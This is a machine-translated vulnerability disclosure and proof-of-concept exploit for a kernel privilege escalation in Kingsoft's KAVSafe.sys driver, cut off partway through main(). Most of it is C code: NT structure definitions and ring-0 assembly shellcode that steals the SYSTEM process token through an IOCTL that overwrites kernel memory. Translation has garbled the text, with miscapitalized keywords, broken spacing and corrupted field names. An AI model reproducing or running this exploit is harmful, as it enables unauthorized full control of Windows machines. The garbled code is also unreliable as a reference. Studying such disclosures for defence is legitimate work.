Kavsafe. sys create a device called DeviceKAVSafe, and handles DeviceIoControl request IoControlCode = 0x830020d4, which can overwrite arbitrary kernel module data
Machine Translation:
Kavsafe. sys creates a device named DeviceKAVSafe and processes the DeviceIoControl request IoControlCode = 0x830020d4, which can overwrite data in any kernel module.
Test code:
VULNERABLE PRODUCTS
# Define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE (0x8300, 0x835, METHOD_BUFFERED, FILE_ANY_ACCESS)
Typedef LONG (WINAPI * PNT_QUERY_INFORMATION_PROCESS )(
HANDLE ProcessHandle,
DWORD ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
Typedef struct _ STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} STRING;
Typedef STRING * PSTRING;
Typedef struct _ RTL_DRIVE_LETTER_CURDIR {
USHORT Flags;
USHORT Length;
ULONG TimeStamp;
STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
Typedef struct _ UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
Typedef UNICODE_STRING * PUNICODE_STRING;
Typedef const UNICODE_STRING * PCUNICODE_STRING;
# Define RTL_MAX_DRIVE_LETTERS 32
# Define RTL_DRIVE_LETTER_VALID (USHORT) 0x0001
Typedef struct _ CURDIR {
UNICODE_STRING DosPath;
HANDLE Handle;
} CURDIR, * PCURDIR;
Typedef struct _ RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
HANDLE ConsoleHandle;
ULONG ConsoleFlags;
HANDLE StandardInput;
HANDLE StandardOutput;
HANDLE StandardError;
CURDIR CurrentDirectory; // ProcessParameters
UNICODE_STRING DllPath; // ProcessParameters
UNICODE_STRING ImagePathName; // ProcessParameters
UNICODE_STRING CommandLine; // ProcessParameters
PVOID Environment; // NtAllocateVirtualMemory
ULONG StartingX;
ULONG StartingY;
ULONG CountX;
ULONG CountY;
ULONG CountCharsX;
ULONG CountCharsY;
ULONG FillAttribute;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING WindowTitle; // ProcessParameters
UNICODE_STRING using topinfo; // ProcessParameters
UNICODE_STRING ShellInfo; // ProcessParameters
UNICODE_STRING RuntimeData; // ProcessParameters
RTL_DRIVE_LETTER_CURDIR CurrentDirectores [RTL_MAX_DRIVE_LETTERS];
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
Typedef struct _ PEB {
BOOLEAN InheritedAddressSpace; // These four fields cannot change unless
BOOLEAN ReadImageFileExecOptions ;//
BOOLEAN BeingDebugged ;//
BOOLEAN SpareBool ;//
HANDLE Mutant; // INITIAL_PEB structure is also updated.
PVOID ImageBaseAddress;
PVOID Ldr;
Struct _ RTL_USER_PROCESS_PARAMETERS * ProcessParameters;
} PEB, * PPEB;
Typedef long kpriority;
Typedef struct _ PROCESS_BASIC_INFORMATION {
LONG ExitStatus;
PVOID PebBaseAddress;
ULONG_PTR AffinityMask;
KPRIORITY BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, * PPROCESS_BASIC_INFORMATION;
Typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName [256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
Typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module [1];
} X_SYSTEM_MODULE_INFORMATION, * PX_SYSTEM_MODULE_INFORMATION;
Typedef LONG (WINAPI * PNT_QUERY_SYSTEM_INFORMATION )(
LONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
# Define NtCurrentProcess () (HANDLE) (LONG_PTR)-1)
Typedef LONG (WINAPI * PNT_VDM_CONTROL )(
ULONG Service,
PVOID ServiceData
);
VOID _ declspec (naked) R0ShellCodeXP ()
{
_ Asm
{
Mov eax, 0xffdff124
Mov eax, [eax]
Mov esi, dword ptr [eax + 0x220]
Mov eax, esi
Searchxp:
Mov eax, dword ptr [eax + 0x88]
Sub eax, 0x88
Mov edx, dword ptr [eax + 0x84]
Cmp edx, 4
Jnz searchxp
Mov eax, dword ptr [eax + 0xc8]
Mov dword ptr [esi + 0xc8], eax
Ret 8
}
}
VOID NopNop ()
{
Printf ("nop! ");
}
# Include "malloc. h"
Int main (int argc, char * argv [])
{
Printf ("KSWebShield KAVSafe. sys <= 2010,04, 14,609"
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept"
"2010-5-23"
"By Lincoin Press Enter ");
HKEY hkey;
WCHAR InstallPath [MAX_PATH];
DWORD datatype;
DWORD datasize = MAX_PATH * sizeof (WCHAR );
ULONG oldlen;
PVOID pOldBufferData = NULL;
If (RegOpenKey (HKEY_LOCAL_MACHINE, "SOFTWARE \ Kingsoft \ KSWSVC", & h